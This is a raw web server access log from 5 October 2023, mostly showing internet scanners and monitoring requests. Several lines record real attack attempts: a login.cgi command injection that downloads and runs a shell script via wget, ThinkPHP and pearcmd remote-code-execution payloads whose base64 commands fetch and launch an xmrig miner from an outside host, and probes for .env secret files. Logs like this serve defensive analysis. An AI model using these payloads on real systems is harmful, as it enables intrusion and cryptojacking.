167.248.133.49 - - [05/Oct/2023:02:02:05 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.49 - - [05/Oct/2023:02:02:05 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
165.232.155.61 - - [05/Oct/2023:02:13:14 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.170.144.3 - - [05/Oct/2023:02:20:16 +0200] "\x03" 501 316 "-" "-"
165.232.155.201 - - [05/Oct/2023:02:20:17 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
165.232.155.61 - - [05/Oct/2023:02:26:35 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
193.35.18.187 - - [05/Oct/2023:02:35:22 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
205.210.31.22 - - [05/Oct/2023:02:35:52 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
205.210.31.11 - - [05/Oct/2023:02:37:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
34.67.136.168 - - [05/Oct/2023:02:45:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"
13.64.109.120 - - [05/Oct/2023:02:58:29 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
13.64.109.120 - - [05/Oct/2023:02:58:29 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
13.64.109.120 - - [05/Oct/2023:02:58:31 +0200] "GET /sendgrid/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
13.64.109.120 - - [05/Oct/2023:02:58:31 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.181.60.12 - - [05/Oct/2023:03:11:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54"
193.35.18.187 - - [05/Oct/2023:03:22:04 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
197.40.230.253 - - [05/Oct/2023:03:23:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
187.76.204.234 - - [05/Oct/2023:03:24:11 +0200] "GET /login.cgi?cli=aa%20aa%27cd%20/tmp;wget%20http://194.180.48.100/l.sh;chmod%20777%20l.sh%20sh%20/tmp/%27$l.sh HTTP/1.1" 400 329 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
193.35.18.187 - - [05/Oct/2023:03:40:58 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
193.35.18.187 - - [05/Oct/2023:03:43:51 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
194.180.49.230 - - [05/Oct/2023:03:44:26 +0200] "GET /login.cgi?cli=aa%20aa%27cd%20/tmp;wget%20http://194.180.48.100/l.sh;chmod%20777%20l.sh%20sh%20/tmp/%27$l.sh HTTP/1.1" 400 329 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
180.149.125.166 - - [05/Oct/2023:03:45:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
51.254.59.113 - - [05/Oct/2023:03:55:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
34.204.47.10 - - [05/Oct/2023:03:57:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/58.0.3001.79 Safari/537.32"
193.35.18.187 - - [05/Oct/2023:04:03:42 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
134.209.46.71 - - [05/Oct/2023:04:06:16 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
198.235.24.220 - - [05/Oct/2023:04:06:20 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.220 - - [05/Oct/2023:04:06:20 +0200] "\x16\x03\x01" 501 318 "-" "-"
81.12.114.2 - - [05/Oct/2023:04:07:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
134.209.46.71 - - [05/Oct/2023:04:12:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
134.209.46.71 - - [05/Oct/2023:04:12:18 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "http://212.91.246.84/" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
216.218.206.67 - - [05/Oct/2023:04:14:58 +0200] "\x16\x03\x01" 501 318 "-" "-"
64.62.197.121 - - [05/Oct/2023:04:15:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
87.236.176.148 - - [05/Oct/2023:04:29:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
198.235.24.126 - - [05/Oct/2023:04:31:20 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
80.66.88.204 - - [05/Oct/2023:04:32:19 +0200] "\x03" 501 316 "-" "-"
180.149.125.168 - - [05/Oct/2023:04:34:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
80.76.51.191 - - [05/Oct/2023:04:35:58 +0200] "POST /cgi/networkDiag.cgi HTTP/1.1" 404 320 "-" "-"
184.105.247.254 - - [05/Oct/2023:04:36:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0"
64.62.197.163 - - [05/Oct/2023:04:36:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0"
65.49.1.35 - - [05/Oct/2023:04:36:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.56"
64.62.197.160 - - [05/Oct/2023:04:37:39 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0"
184.105.247.254 - - [05/Oct/2023:04:37:49 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
65.49.1.35 - - [05/Oct/2023:04:38:00 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; rv:110.0) Gecko/20100101 Firefox/110.0"
64.62.197.155 - - [05/Oct/2023:04:38:25 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0"
184.105.247.254 - - [05/Oct/2023:04:38:36 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0"
65.49.1.36 - - [05/Oct/2023:04:38:42 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.56"
45.79.181.104 - - [05/Oct/2023:04:44:22 +0200] "\x16\x03\x01" 501 318 "-" "-"
192.155.88.231 - - [05/Oct/2023:04:46:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
180.149.125.165 - - [05/Oct/2023:04:46:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
172.105.128.12 - - [05/Oct/2023:04:47:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
172.104.11.34 - - [05/Oct/2023:04:47:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.79.163.53 - - [05/Oct/2023:04:47:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
172.104.11.51 - - [05/Oct/2023:04:47:57 +0200] "\x16\x03\x01" 501 318 "-" "-"
172.104.11.46 - - [05/Oct/2023:04:48:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.33.80.243 - - [05/Oct/2023:04:48:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
172.104.11.46 - - [05/Oct/2023:04:48:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.79.181.179 - - [05/Oct/2023:04:49:16 +0200] "\x16\x03\x01" 501 318 "-" "-"
172.104.11.46 - - [05/Oct/2023:04:50:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
192.155.90.220 - - [05/Oct/2023:04:51:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
41.190.70.194 - - [05/Oct/2023:04:52:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
45.79.128.205 - - [05/Oct/2023:04:53:36 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.79.181.94 - - [05/Oct/2023:04:55:11 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.79.181.94 - - [05/Oct/2023:04:55:50 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.79.181.104 - - [05/Oct/2023:04:57:10 +0200] "\x16\x03\x01" 501 318 "-" "-"
172.104.11.51 - - [05/Oct/2023:04:58:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
194.165.16.73 - - [05/Oct/2023:05:00:44 +0200] "\x03" 501 316 "-" "-"
162.216.149.203 - - [05/Oct/2023:05:01:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
180.149.125.163 - - [05/Oct/2023:05:05:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
192.155.90.118 - - [05/Oct/2023:05:06:05 +0200] "\x16\x03\x01" 501 318 "-" "-"
172.105.128.12 - - [05/Oct/2023:05:06:46 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.79.172.21 - - [05/Oct/2023:05:08:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.180.140.4 - - [05/Oct/2023:05:15:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.189 - - [05/Oct/2023:05:16:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.71 - - [05/Oct/2023:05:18:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.71 - - [05/Oct/2023:05:18:37 +0200] "GET /showLogin.cc HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.79.172.21 - - [05/Oct/2023:05:20:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.89.86.24 - - [05/Oct/2023:05:22:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
45.79.172.21 - - [05/Oct/2023:05:22:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
35.203.210.213 - - [05/Oct/2023:05:23:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
45.79.172.21 - - [05/Oct/2023:05:30:25 +0200] "\x16\x03\x01" 501 318 "-" "-"
162.216.149.97 - - [05/Oct/2023:05:34:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
2.58.95.11 - - [05/Oct/2023:05:37:59 +0200] "POST / HTTP/1.1" 200 1229 "http://212.91.246.85:80/" "Mozilla/5.0"
84.54.51.12 - - [05/Oct/2023:05:39:14 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
35.203.210.13 - - [05/Oct/2023:05:43:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.180.143.50 - - [05/Oct/2023:05:44:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
202.138.250.43 - - [05/Oct/2023:05:51:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
43.157.65.152 - - [05/Oct/2023:05:55:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.64.1"
45.95.147.236 - - [05/Oct/2023:06:02:53 +0200] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/ohhellohttpserver.php HTTP/1.1" 404 314 "-" "Custom-HttpClient"
45.95.147.236 - - [05/Oct/2023:06:02:54 +0200] "GET /index.php?lang=../../../../../../../../tmp/ohhellohttpserver HTTP/1.1" 404 314 "-" "Custom-HttpClient"
45.95.147.236 - - [05/Oct/2023:06:02:54 +0200] "GET /index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=echo${IFS}bWtkaXIgLXAgL3RtcC8kKHdob2FtaSkgJiYgY2QgL3RtcC8kKHdob2FtaSk7IHdnZXQgaHR0cDovLzE4NS4yMjUuNzUuMjQyL2Rvd25sb2FkL3htcmlnLng4Nl82NDsgY3VybCAtTyB3Z2V0IGh0dHA6Ly8xODUuMjI1Ljc1LjI0Mi9kb3dubG9hZC94bXJpZy54ODZfNjQ7IHJtIC1yZiAuZm94bTsgbXYgeG1yaWcueDg2XzY0IC5mb3htOyBjaG1vZCAreCAuZm94bTsgLi8uZm94bQ==|base64${IFS}-d|sh HTTP/1.1" 404 314 "-" "Custom-HttpClient"
45.95.147.236 - - [05/Oct/2023:06:02:56 +0200] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=eval&vars[1][]='shell_exec(base64_decode(\"bWtkaXIgLXAgL3RtcC8kKHdob2FtaSkgJiYgY2QgL3RtcC8kKHdob2FtaSk7IHdnZXQgaHR0cDovLzE4NS4yMjUuNzUuMjQyL2Rvd25sb2FkL3htcmlnLng4Nl82NDsgY3VybCAtTyB3Z2V0IGh0dHA6Ly8xODUuMjI1Ljc1LjI0Mi9kb3dubG9hZC94bXJpZy54ODZfNjQ7IHJtIC1yZiAuZm94bTsgbXYgeG1yaWcueDg2XzY0IC5mb3htOyBjaG1vZCAreCAuZm94bTsgLi8uZm94bQ==\"));' HTTP/1.1" 404 314 "-" "Custom-HttpClient"
45.95.147.236 - - [05/Oct/2023:06:02:57 +0200] "GET /public/index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=eval&vars[1][]='shell_exec(base64_decode(\"bWtkaXIgLXAgL3RtcC8kKHdob2FtaSkgJiYgY2QgL3RtcC8kKHdob2FtaSk7IHdnZXQgaHR0cDovLzE4NS4yMjUuNzUuMjQyL2Rvd25sb2FkL3htcmlnLng4Nl82NDsgY3VybCAtTyB3Z2V0IGh0dHA6Ly8xODUuMjI1Ljc1LjI0Mi9kb3dubG9hZC94bXJpZy54ODZfNjQ7IHJtIC1yZiAuZm94bTsgbXYgeG1yaWcueDg2XzY0IC5mb3htOyBjaG1vZCAreCAuZm94bTsgLi8uZm94bQ==\"));' HTTP/1.1" 404 321 "-" "Custom-HttpClient"
198.235.24.163 - - [05/Oct/2023:06:03:27 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
2.58.95.11 - - [05/Oct/2023:06:08:19 +0200] "POST / HTTP/1.1" 200 1229 "http://212.91.246.89:80/" "Mozilla/5.0"
2.58.95.11 - - [05/Oct/2023:06:08:55 +0200] "POST / HTTP/1.1" 200 1229 "http://212.91.246.86:80/" "Mozilla/5.0"
185.189.182.234 - - [05/Oct/2023:06:09:00 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
80.76.51.191 - - [05/Oct/2023:06:12:21 +0200] "POST /cgi/networkDiag.cgi HTTP/1.1" 404 320 "-" "-"
205.210.31.95 - - [05/Oct/2023:06:19:48 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
193.35.18.187 - - [05/Oct/2023:06:21:34 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
198.199.115.10 - - [05/Oct/2023:06:29:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.199.115.10 - - [05/Oct/2023:06:29:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.199.115.10 - - [05/Oct/2023:06:29:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.199.115.10 - - [05/Oct/2023:06:29:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.199.115.10 - - [05/Oct/2023:06:29:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.199.115.10 - - [05/Oct/2023:06:30:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
134.209.175.109 - - [05/Oct/2023:06:30:23 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
198.199.115.10 - - [05/Oct/2023:06:30:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.199.115.10 - - [05/Oct/2023:06:31:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.199.115.10 - - [05/Oct/2023:06:31:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.199.115.10 - - [05/Oct/2023:06:31:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
159.65.63.54 - - [05/Oct/2023:06:34:28 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
159.65.63.54 - - [05/Oct/2023:06:34:44 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
159.65.63.54 - - [05/Oct/2023:06:34:45 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
159.65.63.54 - - [05/Oct/2023:06:34:47 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
159.65.63.54 - - [05/Oct/2023:06:35:08 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
45.79.181.251 - - [05/Oct/2023:06:35:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
84.54.51.12 - - [05/Oct/2023:06:35:28 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
172.105.128.11 - - [05/Oct/2023:06:35:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.94.138.126 - - [05/Oct/2023:06:36:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.126 - - [05/Oct/2023:06:36:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.126 - - [05/Oct/2023:06:36:35 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.126 - - [05/Oct/2023:06:36:35 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
172.105.128.11 - - [05/Oct/2023:06:38:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
180.149.125.169 - - [05/Oct/2023:06:38:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
45.79.181.223 - - [05/Oct/2023:06:41:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
128.14.209.38 - - [05/Oct/2023:06:41:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
34.78.6.216 - - [05/Oct/2023:06:45:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
35.187.98.121 - - [05/Oct/2023:06:47:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
64.62.197.12 - - [05/Oct/2023:06:48:34 +0200] "\x16\x03\x01" 501 318 "-" "-"
65.49.1.19 - - [05/Oct/2023:06:48:51 +0200] "\x16\x03\x01" 501 318 "-" "-"
65.49.1.87 - - [05/Oct/2023:06:48:52 +0200] "\x16\x03\x01" 501 318 "-" "-"
185.189.182.234 - - [05/Oct/2023:06:49:05 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
130.211.54.158 - - [05/Oct/2023:06:49:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
35.195.93.98 - - [05/Oct/2023:06:57:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
134.209.30.57 - - [05/Oct/2023:06:59:26 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
134.209.30.57 - - [05/Oct/2023:06:59:31 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
212.91.246.72 - - [05/Oct/2023:07:00:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Oct/2023:07:01:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.203.211.91 - - [05/Oct/2023:07:02:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [05/Oct/2023:07:02:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Oct/2023:07:03:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Oct/2023:07:04:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Oct/2023:07:05:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
